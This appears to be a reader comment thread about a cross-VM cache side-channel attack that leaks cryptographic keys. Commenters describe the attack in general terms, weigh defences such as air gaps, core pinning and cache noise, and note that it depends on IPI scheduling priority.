The attacking VM fills the cache in a way that the target VM, which is processing a cryptographic key, may overwrite some of the attacker's data. By looking at which parts of the cache are changed, the attacking VM learns about the key in use.

Clever bastards. And pretty undetectable, too.

Ways to avoid such exploit headaches in the real world consist of countermeasures that administrators may take to avoid the leakage. One is to use a separate, "air-gapped" computer for high-security tasks.

In other words, do not use VM technology. The whole point of VM is that there is no air gap needed supposedly.

Couldn't this be addressed by simply locking each VM to a separate core and deactivating the cache during crypto calls? I don't know if current architectures support this but old processors had instructions that operated strictly off registers.

Couldn't this be addressed by simply locking each VM to a separate core and deactivating the cache during crypto calls?

Which would pretty much defeat the idea of virtualisation in the first place. The point of is to have separate stuff running concurrently on the same hardware. The software you run doesn't know it's running in a VM - and the VM doesn't really know what is running inside it (i.e. it can't really tell for what it's putting stuff in the cache)

Then have the host intermittently overwrite some of the cache memory at random intervals, to add noise to the system.

The attacker relies on knowing the algorithm the target is using and that the code path is dependent on the key. Deduce the path and then you have the key. Of course you have to have the system prioritize scheduling for IPI's. Nice work but very special case. Without IPI priority no result.